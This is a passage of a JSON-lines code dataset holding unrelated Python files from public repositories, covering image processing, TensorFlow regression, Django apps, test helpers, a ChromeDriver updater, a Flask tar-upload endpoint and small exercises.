writer.writerow([color_r, color_g, color_b])\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n if ((img[x, y, 0] == color_r) and (img[x, y, 1] == color_g) and \\\n (img[x, y, 2] == color_b)):\n writer.writerow([x, y])\n\n \n \"\"\"\n name = \"painting1.csv\"\n # name = path + \"painting1.csv\"\n with open(name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n writer.writerow(['Spam'] * 5 + ['Baked Beans'])\n writer.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam']) \n \"\"\"\nif __name__ == \"__main__\":\n np_color_table = color_table()\n size = np_color_table.shape\n bl_table, r_table, g_table, b_table = classify_table(np_color_table)\n\n new_img = img_2_paint(\"./test/bgr_object.png\")\n compare_color(new_img, bl_table, r_table, g_table, b_table)\n\n paint_2_csv(\"./test/final.png\")","repo_name":"applejenny66/snoopy","sub_path":"gen_point.py","file_name":"gen_point.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33591230179","text":"from PySide import QtGui\n'''\n\ncreates a widget that has a frame with a \\\ntitled label around your contents\n\ndiffers from QLabel by accepting both widgets and contents\n\n'''\nclass LabelWidget(QtGui.QGroupBox):\n def __init__(self,label,contents=None):\n QtGui.QGroupBox.__init__(self,label)\n if isinstance(contents,QtGui.QLayout):\n self.setLayout(contents)\n elif isinstance(contents,QtGui.QWidget):\n l = QtGui.QVBoxLayout()\n l.addWidget(contents)\n self.setLayout(l)\n","repo_name":"creilly/sitzlabexpcontrol","sub_path":"qtutils/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"34251802719","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets as skds\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n# Create dummy data\nX, y = skds.make_regression(n_samples=200, n_features=1, n_informative=1, n_targets=1, noise=20.0) # 200 samples, each for the targer (yi) and predictor (Xi)\n\n# Reshape numpy array to have 2 dimensions\nif (y.ndim == 1):\n y = y.reshape(len(y), 1)\n\n# Plotting\nplt.figure(figsize=(7, 4))\nplt.plot(X, y, '.b')\nplt.show()\n\n\n# Split the data into training and testing datasets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=123) # set aside 30% dataset for testing\n\n# Defining inputs, parameters and other variables\nnum_outputs = y_train.shape[1] # One response variable\nnum_inputs = X_train.shape[1] # One predictor variable\n\n# Define eqn: y = W*x + b\n# Use placeholders\ntf.compat.v1.disable_eager_execution() # tf.compat.v1 is the compatible api version with the specific methods\n\nx_tensor = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, num_inputs], name='x')\ny_tensor = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, num_outputs], name='y')\nw = tf.Variable(tf.zeros([num_inputs, num_outputs]), dtype=tf.float32, name='w')\nb = tf.Variable(tf.zeros([num_outputs]), dtype=tf.float32, name='b')\n\nmodel = tf.matmul(x_tensor, w) + b\n\n# Defining the loss funtion\n# Mean squared error/ residuals (MSE)\n# residual = (Y)predict - (Y)actual; residual = model - ytensor\nloss = tf.reduce_mean(tf.square(model - y_tensor)) # Mean squared arror \n\n# Compute MSE and R2\nmse = loss\ny_mean = tf.reduce_mean(y_tensor)\ntotal_error = tf.reduce_sum(tf.square(y_tensor - y_mean))\nunexplained_error = tf.reduce_sum(tf.square(y_tensor-model))\nrsq = 1 - tf.divide(unexplained_error, total_error) # R2 = 1 - unexplained error / total error, signifies the goodness of fit\n\n \n# Define optimizer function\nlearning_rate = 0.001\noptimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss=loss)\n# Gradient descent is an algorithm that minimizes functions (loss funtion in this example)\n# learning rate is the step size we take per iteration towards the solution\n\n# Train the model\nnum_epochs = 1800 # number of iterations to run the training\n\n# w_hat and b_hat: estimates of w and b\nw_hat = 0\nb_hat = 0\n\nloss_epochs = np.empty(shape=[num_epochs], dtype=float)\nmse_epochs = np.empty(shape=[num_epochs], dtype=float)\nrs_epochs = np.empty(shape=[num_epochs], dtype=float)\n\n#initial values\nmse_score = 0\nrsq_score = 0\n\nwith tf.compat.v1.Session() as tfs:\n tfs.run(tf.compat.v1.global_variables_initializer()) # run optimizer / loop on training data\n for epoch in range(num_epochs):\n feed_dict = {x_tensor: X_train, y_tensor: y_train}\n loss_val, _ = tfs.run([loss, optimizer], feed_dict=feed_dict)\n loss_epochs[epoch] = loss_val #calculate and store error\n feed_dict = {x_tensor: X_test, y_tensor: y_test}\n mse_score, rsq_score = tfs.run([mse, rsq], feed_dict=feed_dict)\n mse_epochs[epoch] = mse_score\n rs_epochs[epoch] = rsq_score\n\n w_hat, b_hat = tfs.run([w, b]) # final values of w and b obtained after all iterations\n w_hat = w_hat.reshape(1)\n\nprint('model: Y = {0:.8f} X + {1:.8f}'.format(w_hat[0], b_hat[0]))\nprint('For test data: MSE = {0:.8f}, R2 = {1:.8f}'.format(mse_score, rsq_score))\n\n# Visulatization of resulting linear regression fit\nplt.figure(figsize=(14, 8))\nplt.title('original data and Trained model')\n\nx_plot = [np.min(X) - 1, np.max(X) + 1] #Range of X values\ny_plot = w_hat * x_plot + b_hat # w_hat and b_hat predicited before\nplt.axis([x_plot[0], x_plot[1], y_plot[0], y_plot[1]])\nplt.plot(X, y, '.b', label='Original Data')\nplt.plot(x_plot, y_plot, 'r-', label='Trained Model')\nplt.legend()\nplt.show()\n\n# plot loss and mse with epochs\nplt.figure(figsize=(14, 8))\nplt.axis([0, num_epochs, 0, np.max(loss_epochs)])\nplt.title('Loss in Iterations')\nplt.xlabel('# Epoch')\nplt.ylabel('# MSE')\n\nplt.axis([0, num_epochs, 0, np.max(mse_epochs)])\nplt.plot(mse_epochs, label='MSE on X_test')\nplt.xlabel('# Epoch')\nplt.ylabel('MSE')\nplt.legend()\nplt.show()","repo_name":"nishantp-home/Masters-DataSciences","sub_path":"TensorFlowAndKerasForDataScience/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10673796528","text":"import cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv.imread('Photos/cats.jpg')\r\n\r\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\ncv.imshow(\"Gray\",gray)\r\n\r\n#Graysclae Histogram\r\n\r\nhistogram = cv.calcHist([gray], [0], None, [256],[0,256])\r\n\r\nplt.figure()\r\nplt.title('Grayscale Histogram')\r\nplt.xlabel('Bins')\r\nplt.ylabel('# of pixels ')\r\nplt.plot(histogram)\r\nplt.xlim([0,256])\r\nplt.show()\r\n\r\n\r\n\r\ncv.waitKey(0)","repo_name":"YusufBerkSaridogan/Python-OpenCV","sub_path":"Basic/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"18135504143","text":"from playwright.sync_api import Page, expect\n\n\ndef login(page: Page):\n \"\"\"\n Log in to the site\n \"\"\"\n page.goto(\"http://localhost:5000/login\")\n\n page.locator(\"#userEmail\").fill(\"test@example.com\")\n page.locator(\"#userPassword\").fill(\"test\")\n page.locator(\"button[value=login]\").click()\n\n expect(page.get_by_text(\"Clock In\")).to_be_attached()\n\n\ndef open_menu_and_click(text: str, page: Page):\n \"\"\"\n Open the navigation menu and click the item with the given text\n \"\"\"\n menu = page.locator(\"#menu\")\n menu.locator(\"li > a\").first.click()\n menu.get_by_text(text).click()\n\n\ndef execute_sql(statements: list[str]):\n \"\"\"\n Execute a list of SQL statements\n Useful for test set up and teardown\n \"\"\"\n from sqlalchemy import text\n\n from app import create_app, db\n\n app = create_app(test_mode=True)\n\n with app.app_context(), app.test_request_context():\n conn = db.engine.connect()\n\n for statement in statements:\n conn.execute(text(statement))\n conn.execute(text(\"COMMIT\"))\n conn.close()\n","repo_name":"danstewart/log-my-time","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11610562211","text":"import cv2\nimport urllib\nimport os\nimport pdb\nimport numpy as np\n\nsnap = os.environ[\"SNAP\"]\nface_cascade = cv2.CascadeClassifier(snap + '/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml')\neyes_cascade = cv2.CascadeClassifier(snap + '/usr/share/opencv4/haarcascades/haarcascade_eye.xml')\n\nclass VideoCamera(object):\n def __init__(self):\n # Using OpenCV to capture from device 0. If you have trouble capturing\n # from a webcam, comment the line below out and use a video file\n # instead.\n #self.video = urllib.urlopen('http://192.168.10.12:8080/video') #cv2.VideoCapture(0)\n self.video = cv2.VideoCapture(0)\n self.video.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n self.video.set(cv2.CAP_PROP_FRAME_HEIGHT, 360)\n # If you decide to use video.mp4, you must have this file in the folder\n # as the main.py.\n # self.video = cv2.VideoCapture('video.mp4')\n\n def __del__(self):\n self.video.release()\n\n def detect_eyes(self, gray, frame):\n \"\"\" Input = greyscale image or frame from video stream\n Output = Image with rectangle boxes around eyes and face\n \"\"\"\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (32, 84, 233), 2)\n\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n\n eyes = eyes_cascade.detectMultiScale(roi_gray, 1.1, 3)\n\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (111, 33, 119), 2)\n #cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n\n return frame\n\n def detect_faces(self, gray, frame):\n \"\"\" Input = greyscale image or frame from video stream\n Output = Image with rectangle box in the face\n \"\"\"\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (32, 84, 233), 2)\n\n return frame\n\n def get_frame(self):\n success, image = self.video.read()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n canvas = self.detect_eyes(gray, image)\n\n ret, jpeg = cv2.imencode('.jpg', image)\n return jpeg.tobytes()\n","repo_name":"ogra1/opencv-html-demo","sub_path":"demos/bin/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23246280876","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nfrom json.tool import main\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport openpyxl # 2022.05.10 ADD\r\nimport datetime\r\n\r\nimport sqlite3 # 2022.05.16 UPDATE\r\n\r\ndef main():\r\n\r\n today = datetime.date.today()\r\n yyyymmdd = today.strftime('%Y%m%d')\r\n\r\n wb = openpyxl.load_workbook('c:/Python/test/sp.xlsx') # 2022.05.10 UPDATE\r\n\r\n try:\r\n wb.remove_sheet(wb.get_sheet_by_name(yyyymmdd)) \r\n except:\r\n pass\r\n \r\n wb.create_sheet(index=0, title=yyyymmdd)\r\n wb.save('c:/Python/test/sp.xlsx')\r\n\r\n sheet = wb[yyyymmdd]\r\n\r\n db_path = \"c:\\Python\\SQLite\\jvn.db\" # 2022.05.16 UPDATE\r\n conn = sqlite3.connect(db_path) # 2022.05.16 UPDATE\r\n cur = conn.cursor()\r\n\r\n gets = requests.get('http://jvn.jp/report')\r\n\r\n\r\n soup = BeautifulSoup(gets.text, 'html.parser')\r\n\r\n\r\n airs = []\r\n\r\n for tag in soup.find_all('dt'):\r\n airs.append(tag.text)\r\n \r\n i = 1\r\n for air in airs:\r\n\r\n work = air.strip()\r\n wk = work.replace(' ', '') \r\n sheet.cell(row=i, column=1, value=wk[0:10])\r\n sheet.cell(row=i, column=2, value=wk[10:].replace(':', ''))\r\n # print(wk[10:15])\r\n if str(wk[10:15]) == \"JVNVU\":\r\n urls = \"http://jvn.jp/vu/\" + wk[10:].replace(':', '').replace('#', '') + \"/index.html\"\r\n else:\r\n urls = \"http://jvn.jp/jp/\" + wk[10:].replace(':', '').replace('#', '') + \"/index.html\"\r\n sheet.cell(row=i, column=3, value=urls)\r\n\r\n # ADD 2022.05.16 --- START\r\n jvndate = wk[0:10]\r\n jvncode = wk[10:].replace(':', '')\r\n jvnurl = urls\r\n\r\n ### sql = 'INSERT INTO JVN (JVNCODE, JVNDATE, JVNURL) values (?,?,?)'\r\n sql = 'INSERT INTO JVN (JVNCODE, JVNDATE, JVNURL) values (?,?,?) ON CONFLICT DO NOTHING'\r\n # print(jvncode)\r\n # print(jvndate)\r\n # print(jvnurl)\r\n data = [jvncode, jvndate, jvnurl]\r\n cur.execute(sql, data)\r\n # ADD 2022.05.16 --- END\r\n\r\n i = i + 1\r\n\r\n wb.save('c:/Python/test/sp.xlsx')\r\n\r\n conn.commit() # 2022.05.16 UPDATE\r\n conn.close() # 2022.05.16 UPDATE\r\n\r\nmain() # 2022.05.10 UPDATE","repo_name":"Munenobu-Nakabayashi/Scraping","sub_path":"spRev3.py","file_name":"spRev3.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32292640655","text":"from django.core.management.base import BaseCommand, CommandError\nfrom hds.models import Gate, Channel, Center\nfrom django.db import transaction\n\nclass Command(BaseCommand):\n help = 'Populate with initial data'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--delete',\n action='store_true',\n dest='delete',\n help='Delete poll instead of closing it',\n )\n\n \n def handle(self, *args, **options):\n if options['delete']:\n \n print(Gate.objects.all().delete())\n print(Channel.objects.all().delete())\n print(Center.objects.all().delete())\n print(\"All deleted\")\n else:\n self.create_gates()\n self.create_channels()\n self.create_centers()\n \n \n \n @transaction.atomic\n def create_gates(self):\n for g in Gate.GATES:\n number, name = g\n gate, created = Gate.objects.get_or_create(number=number, name=name)\n gate.save()\n print(gate)\n \n \n @transaction.atomic\n def create_channels(self):\n for channel in Channel.CHANNELS:\n (1, 8), 'Inspiration', 'A creative Role Model', 'Individual'\n gates, name, title, circuit_group, circuit = channel\n g1, g2 = gates\n gate1 = Gate.objects.get(number=g1)\n gate2 = Gate.objects.get(number=g2)\n channel, created = Channel.objects.get_or_create(gate1=gate1, gate2=gate2, name=name, title=title, circuit_group=circuit_group, circuit=circuit)\n channel.save()\n print(channel)\n \n @transaction.atomic\n def create_centers(self):\n for center in Center.CENTERS:\n center_slug, center_gates = center\n name = center_slug.replace('_',' ').replace('-',' ').title()\n center, created = Center.objects.get_or_create(slug=center_slug, name=name)\n center.save()\n center.gates.set(Gate.objects.filter(number__in=center_gates))\n print(center)\n \n \n","repo_name":"felipe-a-holanda/darpan-astro","sub_path":"darpan/hds/management/commands/hds_initial.py","file_name":"hds_initial.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29306385669","text":"from get_chrome_version import get_chrome_version\nfrom bs4 import BeautifulSoup\nimport requests\nimport difflib\nimport zipfile\nimport json\nimport wget\nimport os\n\n\ndef loadConfig(): \n return json.load(open('config.json'))\n\ndef getAllChomeVersion():\n url = \"https://chromedriver.chromium.org/downloads\"\n req = requests.get(url)\n soup = BeautifulSoup(req.content, 'html.parser')\n\n versions = []\n\n for a in soup.find_all('a', href=True):\n if a['href'].startswith('https://chromedriver.storage.googleapis'):\n if a['href'].endswith('notes.txt'):\n pass\n else:\n version = (a['href'].split('?')[1].split('=')[1])[:-1]\n\n currentDict = [version, a['href']]\n versions.append(currentDict)\n return versions\n\n\ndef checkChromeVersion():\n chromeVersion = get_chrome_version()\n \n versionList = []\n for version in getAllChomeVersion():\n if version[0] not in versionList:\n versionList.append(version[0])\n\n try:\n return difflib.get_close_matches(chromeVersion, versionList)[0]\n except Exception as e:\n print(\"Google Chrome path not found!\")\n exit()\n\n\ndef downloadVersion(downloadVersion = checkChromeVersion()):\n fileLink = f'https://chromedriver.storage.googleapis.com/{downloadVersion}/chromedriver_win32.zip'\n wget.download(fileLink)\n\ndef extractZip():\n with zipfile.ZipFile('chromedriver_win32.zip', 'r') as zip_ref:\n zip_ref.extractall(loadConfig()['path'])\n\ndef deleteZip():\n for item in os.listdir(os.getcwd()):\n if item.endswith(\".zip\"):\n os.remove(os.path.join(os.getcwd(), item))\n\ndownloadVersion()\nextractZip()\ndeleteZip()\nloadConfig()\n\n\n","repo_name":"Xehia/ChromeDriver-Updater","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20451456952","text":"class Node:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def output(self):\n node = self\n while node is not None:\n print(node.val)\n node = node.next\n\n def deleteMiddleNode(self, n):\n node = self\n previous = Node(0)\n while node is not None:\n if n == node.val and node.next is not None:\n previous.next = node.next\n else:\n previous = node\n node = node.next\n\nnode1 = Node(1)\nnode2 = Node(2)\nnode3 = Node(3)\nnode4 = Node(4)\nnode5 = Node(5)\nnode6 = Node(6)\nnode7 = Node(7)\n\nnode1.next = node2\nnode2.next = node3\nnode3.next = node4\nnode4.next = node5\nnode5.next = node6\nnode6.next = node7\n\nnode1.deleteMiddleNode(4)\nnode1.output()\n\n\n","repo_name":"hkwan003/Cracking-the-Coding-Interview","sub_path":"2. Linked Lists/2.3 Delete Middle Node.py","file_name":"2.3 Delete Middle Node.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3007151275","text":"#!/usr/bin/env python3\n\n\"\"\"\nBASICS\n\nSubstitutes the current content for a user for new content\n\"\"\"\n\n\nimport os, shutil\nfrom flask import Flask, send_file, request, jsonify\nimport base_functions as bf\nfrom werkzeug.utils import secure_filename\nimport tarfile\n\n\n\napp = Flask(__name__)\nGREYFISH_FOLDER = os.environ['greyfish_path']+\"/sandbox/\"\n\n\n\n@app.route(\"/grey/push_all//\", methods=['POST'])\ndef push_all(toktok, gkey):\n\n IP_addr = request.environ['REMOTE_ADDR']\n if not bf.valid_key(gkey, toktok):\n return \"INVALID key\"\n if str('DIR_'+toktok) not in os.listdir(GREYFISH_FOLDER):\n return 'INVALID, User directory does not exist'\n\n try:\n file = request.files['file']\n except:\n return \"No file uploaded\"\n\n fnam = file.filename\n\n # Avoids empty filenames and those with commas\n if fnam == '':\n return 'INVALID, no file uploaded'\n\n USER_DIR = GREYFISH_FOLDER+'DIR_'+str(toktok)+'/'\n new_name = secure_filename(fnam)\n\n\n # Must be a valid tar file\n try:\n file.save(USER_DIR + new_name)\n tar = tarfile.open(USER_DIR+new_name)\n tar.getmembers()\n except:\n os.remove(USER_DIR+new_name)\n return \"Tar file cannot be opened, must be .tgz or .tar.gz\"\n\n\n\n user_data = [USER_DIR+x for x in os.listdir(USER_DIR) if x != fnam]\n\n # Deletes all current data and untars the new files\n for content in user_data:\n\n if os.path.isdir(content):\n shutil.rmtree(content)\n continue\n os.remove(content)\n\n tar.extractall(USER_DIR)\n tar.close()\n os.remove(USER_DIR+new_name)\n\n return 'User contents updated in Greyfish'\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ritua2/gib_express","sub_path":"middle-layer/greyfish_storage/push_all.py","file_name":"push_all.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"42324398480","text":"import sys\ndef main():\n captcha = open(sys.argv[1], 'r').readline().strip()\n\n #result = compute_captcha(captcha)\n result = compute_captcha2(captcha)\n print(result)\n\ndef get_halfway(captcha):\n halves = []\n \n half = len(captcha) / 2\n for x in range(len(captcha)):\n num = captcha[x]\n ind = int(x + half)\n if ind > len(captcha) - 1:\n ind = ind - len(captcha)\n if num == captcha[ind]:\n halves.append(num)\n\n return halves\n\ndef compute_captcha2(captcha):\n result = 0\n\n halves = get_halfway(captcha)\n for num in halves:\n result += int(num)\n\n return result\n\ndef compute_captcha(captcha):\n result = 0\n\n matches = get_matches(captcha)\n for num in matches:\n result += int(num)\n\n return result\n\ndef get_matches(input_string):\n matches = []\n\n buff = input_string[-1]\n for char in input_string:\n if buff == char:\n matches.append(char)\n buff = char\n\n return matches\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zsmoore/Advent-Of-Code-2017","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3336461073","text":"import django_filters\nfrom django_filters import *\nfrom .models import *\n\nclass OrderFilter(django_filters.FilterSet):\n start_date = DateFilter(field_name=\"date_created\", lookup_expr='gte')\n end_date = DateFilter(field_name=\"date_created\", lookup_expr='lte')\n notes = CharFilter(field_name=\"notes\", lookup_expr='icontains')\n class Meta:\n model = Order\n fields = '__all__'\n exclude = ['customer', 'date_created']\n\nclass ProductFilter(django_filters.FilterSet):\n #minimum_price = NumberFilter(field_name=\"price\", lookup_expr='gte')\n #maximum_price = NumberFilter(field_name=\"price\", lookup_expr='lte')\n sname = CharFilter(field_name=\"name\", lookup_expr='icontains')\n\n #minimum_price.label = \"Minimum Price\"\n #maximum_price.label = \"Maximum Price\"\n\n class Meta:\n model = Product\n fields = '__all__'\n exclude = ['name','price','description','date_created','image','tags','category']\n \n","repo_name":"gaurangt54/criczone","sub_path":"accounts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22758909534","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nfrom matplotlib.backends.backend_pgf import FigureCanvasPgf\nfrom scipy.interpolate import spline\nmpl.backend_bases.register_backend('pdf', FigureCanvasPgf)\npgf_with_latex = {\n \"pgf.texsystem\": \"xelatex\", # use Xelatex which is TTF font aware\n}\n\nmpl.rcParams.update(pgf_with_latex)\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', serif = 'CMU Serif', size = 12)\nplt.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amsfonts}',\n r'\\usepackage{graphicx}',\n r'\\usepackage[english,russian]{babel}',\n r'\\usepackage[utf8]{inputenc}',\n r'\\usepackage[T1]{fontenc}',\n ]\ng = np.genfromtxt('task2(exp).csv',delimiter=';')\nspline = np.genfromtxt('task2.csv',delimiter=';')\namount = g[:,0]\ntau = g[:,1]\nx1 = spline[0:,0]\ny1 = spline[0:,1]\nfig = plt.figure(figsize=(10,6))\nax = fig.add_subplot(121)\nax.grid(which='both')\nax.plot(x1,y1,color = '#FF7800', label = r'')\nax.errorbar(amount, tau, yerr=0.1, fmt=' ', color = '#FF7800', linewidth=2)\nax.tick_params(axis='x', direction='inout')\nax.tick_params(axis='y', direction='inout')\nax.set_xlabel(r'$N$, количество звеньев')\nax.set_ylabel(r'$\\tau$, мс')\nfig.savefig('task2.pdf')\nplt.show()\n","repo_name":"KirillPonur/filters","sub_path":"LC filters/plots/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18856795361","text":"# Figure out the shapes of intermediate layers produced by\n# mobilenet_v2\n# resnet50\n# From https://github.com/pytorch/vision/issues/3048\nimport torch\nimport torchvision\n\nprint(torchvision.__version__)\nprint(\"\")\n\nimport torchvision.models as models\n\nfrom torchvision.models._utils import IntermediateLayerGetter\n\nbackbone = models.mobilenet_v2(pretrained=None)\n\n# We won't use backbone.forward() anyway, because it's for classification\n# Have to call these sequentially then\n# https://pytorch.org/docs/stable/_modules/torchvision/models/mobilenet.html\nbackbone.layer1 = backbone.features[0:4]\nbackbone.layer2 = backbone.features[4:7]\nbackbone.layer3 = backbone.features[7:14]\nbackbone.layer4 = backbone.features[14:-1]\nbackbone.features = None\nbackbone.classifier = None\n\nreturn_layers = {\n \"layer2\": \"0\",\n \"layer3\": \"1\",\n \"layer4\": \"2\",\n} # they commented out layer1 in backbone.py\n\nbackbone2 = IntermediateLayerGetter(backbone, return_layers)\n\n\nx = torch.rand([1, 3, 512, 1024])\nres = backbone2(x)\n\nprint(\"\\nIntermediateLayerGetter mobilenet_v2 FMs\")\nfor k in res:\n print(k, res[k].shape)\n\nprint(\"\\nInitial mobilenet_v2 FMs\")\nm = models.mobilenet_v2()\na = torch.rand([1, 3, 512, 1024])\nfor i, l in enumerate(m.features):\n a = l(a)\n print(i, l.__class__.__name__, a.shape, end=\"\")\n if i in [3, 6, 13, 17]:\n print(\" <---- desired feature map layer?\")\n\n print(\"\")\n\n\n# Now try with resnet50, should produce same feature map dimensions\n# at some layers but with more channels\n# (resnet18 would be in between mobilenet_v2 and resnet50)\nprint(\"\\nr50 shape\")\n\nx = torch.rand([1, 3, 512, 1024])\nprint(\"x\", x.shape)\n\nr50 = torchvision.models.resnet50(pretrained=True)\nz = r50.conv1(x)\nz = r50.bn1(z)\nz = r50.relu(z)\nz = r50.maxpool(z)\n\n# Potential layers used as feature maps by Deformable-DETR\nprint(\"before layer1\", z.shape)\nz = r50.layer1(z)\nprint(\"after layer1\", z.shape)\nz = r50.layer2(z)\nprint(\"after layer2\", z.shape)\nz = r50.layer3(z)\nprint(\"after layer3\", z.shape)\nz = r50.layer4(z)\nprint(\"after layer4\", z.shape)\n","repo_name":"sethv/dl-dales-project","sub_path":"mobilenet_v2_r50_feature_maps.py","file_name":"mobilenet_v2_r50_feature_maps.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19534554483","text":"import os.path\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport pytz\nimport simplejson\nfrom django.core import serializers\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom django.utils.datetime_safe import datetime\n\nfrom meta_reader.models import Source, Record\n\n\ndef index(request):\n \"\"\"\n Return the index page\n :param request: HTTPRequest\n :return: index page\n \"\"\"\n message = reload_sources()\n index_context = {\n 'status': message,\n 'records': Record.objects.all(),\n }\n return render(request, 'meta_reader/index.html', index_context)\n\n\ndef update(request):\n \"\"\"\n Get an updated list of records\n :param request: HttpRequest\n :return: List records in JSON\n \"\"\"\n message = reload_sources()\n \n records = Record.objects.all()\n \n data = serializers.serialize('json', records)\n \n index_context = {\n 'status': message,\n 'records': data,\n }\n \n return JsonResponse(index_context, safe=False)\n\n\ndef reload_sources():\n \"\"\"\n Return the records table\n :HttpResponse: Http Response message\n \"\"\"\n data_path = os.path.abspath(\"data/\")\n utc = pytz.UTC\n message = \"\"\n \n # Generate 2D array with first column is source name, 2nd column is source absolute path\n list_detected_sources = []\n for f in listdir(data_path):\n p = join(data_path, f);\n if isfile(p):\n list_detected_sources.append([f, p])\n \n # Delete non exist source\n tmp_lst = [x[0] for x in list_detected_sources]\n lst_all = Source.objects.all()\n \n list_source_not_found = lst_all.exclude(source_name__in=list(tmp_lst))\n list_source_not_found.delete()\n \n # Start to process each files in the data folder\n for iterator in list_detected_sources:\n update_flag = False;\n file_name = iterator[0]\n file_path = iterator[1]\n \n # Open file and process if file is correct\n with open(file_path, 'r') as data_file:\n current_date_modified = datetime.fromtimestamp(os.path.getmtime(file_path)).replace(tzinfo=utc)\n \n source, created = Source.objects.get_or_create(\n source_name=file_name,\n defaults=dict(source_name=file_name, date_added=datetime.now(timezone.utc),\n date_modified=current_date_modified),\n )\n \n source_date_modified = source.date_modified\n if created or source_date_modified != current_date_modified:\n update_flag = True # trigger update if create new source or date modified is changed\n \n # Import data\n if update_flag:\n try:\n data = simplejson.load(data_file)\n for o in data:\n tmp_date = datetime.strptime(o['date'], '%b %d, %Y %H:%M:%S').replace(tzinfo=utc)\n record = Record(\n source_id=file_name,\n date=tmp_date,\n filename=o[\"filename\"],\n action=o[\"action\"],\n rating=o[\"rating\"],\n submit_type=o[\"submit-type\"],\n )\n record.save()\n message += r\"Update source {0} to database successfully
    \".format(file_name)\n \n except Exception as e:\n message += r\"Error when updating source {0} to database: {1}

    \".format(\n file_name,\n e.message\n )\n \n # Testing script to check Source insert success\n tmp_src = Source.objects.get(source_name=file_name)\n message += r\"Source: {0}
    • Date added: {1}
    • Last modified: {2}
